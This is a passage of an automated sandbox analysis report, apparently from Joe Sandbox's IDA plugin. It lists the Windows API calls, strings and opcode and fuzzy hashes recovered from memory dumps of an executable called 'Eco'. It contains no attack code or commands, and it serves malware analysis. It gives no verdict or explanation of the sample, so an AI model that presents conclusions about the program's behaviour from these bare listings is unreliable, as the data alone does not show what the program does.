                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: 7e496c1c7f95321b0ef9f5aa83ed92a85dd8b3b915df8a9e2fef1a31f22afaa7
                          • Instruction ID: 2c20a1fe23ba380187ac54beb5a270f6b64ca45b9408718357cbbbb6082b1e04
                          • Opcode Fuzzy Hash: 7e496c1c7f95321b0ef9f5aa83ed92a85dd8b3b915df8a9e2fef1a31f22afaa7
                          • Instruction Fuzzy Hash: CF31B231944616EAEB14EAA0DD87FBE7F64FFA1760F20052AF402B20D2EF616E44C655
                          APIs
                          • LoadIconW.USER32(00000063), ref: 0056C98D
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0056C99F
                          • SetWindowTextW.USER32(?,?), ref: 0056C9B6
                          • GetDlgItem.USER32(?,000003EA), ref: 0056C9CB
                          • SetWindowTextW.USER32(00000000,?), ref: 0056C9D1
                          • GetDlgItem.USER32(?,000003E9), ref: 0056C9E1
                          • SetWindowTextW.USER32(00000000,?), ref: 0056C9E7
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0056CA08
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0056CA22
                          • GetWindowRect.USER32(?,?), ref: 0056CA2B
                          • SetWindowTextW.USER32(?,?), ref: 0056CA96
                          • GetDesktopWindow.USER32 ref: 0056CA9C
                          • GetWindowRect.USER32(00000000), ref: 0056CAA3
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0056CAEF
                          • GetClientRect.USER32(?,?), ref: 0056CAFC
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0056CB21
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0056CB4C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: ba95a32a77f7ecec13b5c2cefde5173f7fbaac7ce322790c59825f8535103b5c
                          • Instruction ID: 6c8e31cf9d92b56798efa4fd1ad9eb67badc1f899494664ff90b0849c7fb4640
                          • Opcode Fuzzy Hash: ba95a32a77f7ecec13b5c2cefde5173f7fbaac7ce322790c59825f8535103b5c
                          • Instruction Fuzzy Hash: 6C515B31900709AFDB20DFA8CD89B6EBFF5FF54709F004929E686A35A0C774A958DB50
                          APIs
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 005854C3
                          • LoadCursorW.USER32(00000000,00007F00), ref: 005854CE
                          • LoadCursorW.USER32(00000000,00007F03), ref: 005854D9
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 005854E4
                          • LoadCursorW.USER32(00000000,00007F01), ref: 005854EF
                          • LoadCursorW.USER32(00000000,00007F81), ref: 005854FA
                          • LoadCursorW.USER32(00000000,00007F88), ref: 00585505
                          • LoadCursorW.USER32(00000000,00007F80), ref: 00585510
                          • LoadCursorW.USER32(00000000,00007F86), ref: 0058551B
                          • LoadCursorW.USER32(00000000,00007F83), ref: 00585526
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00585531
                          • LoadCursorW.USER32(00000000,00007F82), ref: 0058553C
                          • LoadCursorW.USER32(00000000,00007F84), ref: 00585547
                          • LoadCursorW.USER32(00000000,00007F04), ref: 00585552
                          • LoadCursorW.USER32(00000000,00007F02), ref: 0058555D
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00585568
                          • GetCursorInfo.USER32(?), ref: 00585578
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Cursor$Load$Info
                          • String ID:
                          • API String ID: 2577412497-0
                          • Opcode ID: af9304c66151ae12165792185060b34fc002d88e755b4b826a8f9b140722c749
                          • Instruction ID: 203c0a003fa322c3a11da358a65f95396a365498540622da18adf18578abd18a
                          • Opcode Fuzzy Hash: af9304c66151ae12165792185060b34fc002d88e755b4b826a8f9b140722c749
                          • Instruction Fuzzy Hash: EF3107B0D4831A6ADF109FB69C8999EBFE9FF04750F50452AE50CF7280EA78A5048F91
                          APIs
                          • _memset.LIBCMT ref: 0059A646
                          • DestroyWindow.USER32(00000000,?), ref: 0059A6C0
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A73A
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A75C
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A76F
                          • DestroyWindow.USER32(00000000), ref: 0059A791
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 0059A7C8
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A7E1
                          • GetDesktopWindow.USER32 ref: 0059A7FA
                          • GetWindowRect.USER32(00000000), ref: 0059A801
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0059A819
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0059A831
                            • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 1297703922-3619404913
                          • Opcode ID: e4cd242a5ca190743d9d1c6d747a842be4a357a7655e110072b15bf1a214dfd1
                          • Instruction ID: a22a8caefe9a6092752e22b4e0720f366b7e1fff75cbd5fd1758eecaeb7925ac
                          • Opcode Fuzzy Hash: e4cd242a5ca190743d9d1c6d747a842be4a357a7655e110072b15bf1a214dfd1
                          • Instruction Fuzzy Hash: 5271AE70140305AFDB21CF18CC49F6A7BE5FB99304F04091EF985872A1DB71E95AEBA2
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00578187
                          • VariantCopy.OLEAUT32(00000000,?), ref: 00578190
                          • VariantClear.OLEAUT32(00000000), ref: 0057819C
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0057828A
                          • __swprintf.LIBCMT ref: 005782BA
                          • VarR8FromDec.OLEAUT32(?,?), ref: 005782E6
                          • VariantInit.OLEAUT32(?), ref: 00578397
                          • SysFreeString.OLEAUT32(?), ref: 0057842B
                          • VariantClear.OLEAUT32(?), ref: 00578485
                          • VariantClear.OLEAUT32(?), ref: 00578494
                          • VariantInit.OLEAUT32(00000000), ref: 005784D2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: 4fbfb13838fd840f69ecaeacd2fbb8ea8ab23f3630d28a47bcf94703c4db5a30
                          • Instruction ID: 55d94507875d5dbcd1a526f4efbcd2d55c7bbdb9c63c0f47fed8a47eab9467ed
                          • Opcode Fuzzy Hash: 4fbfb13838fd840f69ecaeacd2fbb8ea8ab23f3630d28a47bcf94703c4db5a30
                          • Instruction Fuzzy Hash: 38D1FF70640A16EBDF209F65E84CB7ABFB4BF45700F54C859E419AB281CF70AC45EBA1
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00594829
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00594874
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 3974292440-4258414348
                          • Opcode ID: db4672fddc745c4e275e32b5bcaf0d61da83de189bd11f6d1911d28cb2d987e0
                          • Instruction ID: 0327c21bd579585b158f573731b86b350c7cdd87d6a0bcdcd3aca7520e12559c
                          • Opcode Fuzzy Hash: db4672fddc745c4e275e32b5bcaf0d61da83de189bd11f6d1911d28cb2d987e0
                          • Instruction Fuzzy Hash: 019139742047029FDB05EF10C855E6ABFA6BF94354F04995CE8965B3A2CB31ED4ACF82
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0059BCA1
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005995AF), ref: 0059BCFD
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059BD36
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0059BD79
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059BDB0
                          • FreeLibrary.KERNEL32(?), ref: 0059BDBC
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059BDCC
                          • DestroyIcon.USER32(?,?,?,?,?,005995AF), ref: 0059BDDB
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0059BDF8
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0059BE04
                            • Part of subcall function 0053305F: __wcsicmp_l.LIBCMT ref: 005330E8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 1212759294-1154884017
                          • Opcode ID: 7082e3d11611a83a742b7148f62a6499e299427887d299ba1a72e3c8962979a4
                          • Instruction ID: 0f32ea211d76e44056fa241800505dbeba46966b4fca3452ed723f1f01a0b9db
                          • Opcode Fuzzy Hash: 7082e3d11611a83a742b7148f62a6499e299427887d299ba1a72e3c8962979a4
                          • Instruction Fuzzy Hash: 7261FEB150061ABAFF14DF64ED49FBE7BA8FB08710F104209F915D60D0DBB4AA84DBA0
                          APIs
                            • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005124AF
                          • KillTimer.USER32(-00000001,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0051254A
                          • DestroyAcceleratorTable.USER32(00000000), ref: 0054BF17
                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054BF48
                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054BF5F
                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054BF7B
                          • DeleteObject.GDI32(00000000), ref: 0054BF8D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID: hZ
                          • API String ID: 641708696-3824762921
                          • Opcode ID: f5200253ecd8ed905339b8ca3a2a1764fe183b07e1ae7ea6e51839744eb40090
                          • Instruction ID: aeb1604423d58488ce5f6153250ca73146f24b6f7552eb24acb347e8c9f035db
                          • Opcode Fuzzy Hash: f5200253ecd8ed905339b8ca3a2a1764fe183b07e1ae7ea6e51839744eb40090
                          • Instruction Fuzzy Hash: B061CF31111601DFEB359F14DD48BAA7FF1FB5031AF10991AE04647AA0C775A8EAEF90
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A12F
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0057A150
                          • __swprintf.LIBCMT ref: 0057A1A9
                          • __swprintf.LIBCMT ref: 0057A1C2
                          • _wprintf.LIBCMT ref: 0057A269
                          • _wprintf.LIBCMT ref: 0057A287
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf$_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                          • API String ID: 311963372-3080491070
                          • Opcode ID: 76c9bd7642273a367e765fc79776e1063086ee2b97aa93dc8b38e0513567831e
                          • Instruction ID: fe62fe69ee260984c50796c7e350932bf1b26f0a1078d72b22a860d48e30b0ff
                          • Opcode Fuzzy Hash: 76c9bd7642273a367e765fc79776e1063086ee2b97aa93dc8b38e0513567831e
                          • Instruction Fuzzy Hash: 7451C17190051AAACF14EBE0ED4AEEEBF78BF65340F104125F409B2092DB312F48DBA5
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • CharLowerBuffW.USER32(?,?), ref: 0057A87B
                          • GetDriveTypeW.KERNEL32 ref: 0057A8C8
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A910
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A947
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A975
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 2698844021-4113822522
                          • Opcode ID: 5e2b27bbea7aba419e22929c0d012c5de88b815e8ecfcb257a86b4faa1beb797
                          • Instruction ID: a91f94668e14b7718f0ba1f557df65d46628f77b668d407f91764442de26e0d5
                          • Opcode Fuzzy Hash: 5e2b27bbea7aba419e22929c0d012c5de88b815e8ecfcb257a86b4faa1beb797
                          • Instruction Fuzzy Hash: CB515A711047169FC700EF20D895D6ABBE4FFD5758F00896CF89A97291DB31AE09CB92
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0057A6BF
                          • __swprintf.LIBCMT ref: 0057A6E1
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057A71E
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0057A743
                          • _memset.LIBCMT ref: 0057A762
                          • _wcsncpy.LIBCMT ref: 0057A79E
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0057A7D3
                          • CloseHandle.KERNEL32(00000000), ref: 0057A7DE
                          • RemoveDirectoryW.KERNEL32(?), ref: 0057A7E7
                          • CloseHandle.KERNEL32(00000000), ref: 0057A7F1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 7cfd7a7e2faa529ef08b8e4bf5255754f256727f8eee2dfeeafdb3cf7d982841
                          • Instruction ID: 4bee5bed9b56c739515a219f0597fc9f4eab7355109c6737b8ca4b81175debfe
                          • Opcode Fuzzy Hash: 7cfd7a7e2faa529ef08b8e4bf5255754f256727f8eee2dfeeafdb3cf7d982841
                          • Instruction Fuzzy Hash: 983192B151020AABDB209FA0DC49FEF3BBCFFC9700F1040A6F909D61A1E77096859B25
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0059C61F
                          • GetFocus.USER32 ref: 0059C62F
                          • GetDlgCtrlID.USER32(00000000), ref: 0059C63A
                          • _memset.LIBCMT ref: 0059C765
                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0059C790
                          • GetMenuItemCount.USER32(?), ref: 0059C7B0
                          • GetMenuItemID.USER32(?,00000000), ref: 0059C7C3
                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0059C7F7
                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0059C83F
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059C877
                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0059C8AC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                          • String ID: 0
                          • API String ID: 1296962147-4108050209
                          • Opcode ID: c5a9e907ee49f4a6c469ee7a78dd5dde5de1b4224bf892c378ec5a575453ad6b
                          • Instruction ID: a422689b43ab09559c533fa910e256d906d4d691e6868838a854fe3debdac1fb
                          • Opcode Fuzzy Hash: c5a9e907ee49f4a6c469ee7a78dd5dde5de1b4224bf892c378ec5a575453ad6b
                          • Instruction Fuzzy Hash: 87817D70608301AFDB24CF18D884A6BBFE8FB89354F04492EF99597292D770D945DFA2
                          APIs
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568C1F
                            • Part of subcall function 00568C03: GetLastError.KERNEL32(?,005686E3,?,?,?), ref: 00568C29
                            • Part of subcall function 00568C03: GetProcessHeap.KERNEL32(00000008,?,?,005686E3,?,?,?), ref: 00568C38
                            • Part of subcall function 00568C03: HeapAlloc.KERNEL32(00000000,?,005686E3,?,?,?), ref: 00568C3F
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568C56
                            • Part of subcall function 00568CA0: GetProcessHeap.KERNEL32(00000008,005686F9,00000000,00000000,?,005686F9,?), ref: 00568CAC
                            • Part of subcall function 00568CA0: HeapAlloc.KERNEL32(00000000,?,005686F9,?), ref: 00568CB3
                            • Part of subcall function 00568CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005686F9,?), ref: 00568CC4
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568911
                          • _memset.LIBCMT ref: 00568926
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568945
                          • GetLengthSid.ADVAPI32(?), ref: 00568956
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00568993
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005689AF
                          • GetLengthSid.ADVAPI32(?), ref: 005689CC
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005689DB
                          • HeapAlloc.KERNEL32(00000000), ref: 005689E2
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568A03
                          • CopySid.ADVAPI32(00000000), ref: 00568A0A
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00568A3B
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568A61
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568A75
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 3996160137-0
                          • Opcode ID: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
                          • Instruction ID: 6b74645a7380aee7b539e53d6bcbb66ebf72595ed503906c9acb28bc494465cb
                          • Opcode Fuzzy Hash: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
                          • Instruction Fuzzy Hash: 66614BB190020AAFDF10DFA5DC49EFEBB79FF45310F04822AE915A7290DB359A05DB60
                          APIs
                          • GetDC.USER32(00000000), ref: 0058783E
                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0058784A
                          • CreateCompatibleDC.GDI32(?), ref: 00587856
                          • SelectObject.GDI32(00000000,?), ref: 00587863
                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 005878B7
                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 005878F3
                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00587917
                          • SelectObject.GDI32(00000006,?), ref: 0058791F
                          • DeleteObject.GDI32(?), ref: 00587928
                          • DeleteDC.GDI32(00000006), ref: 0058792F
                          • ReleaseDC.USER32(00000000,?), ref: 0058793A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
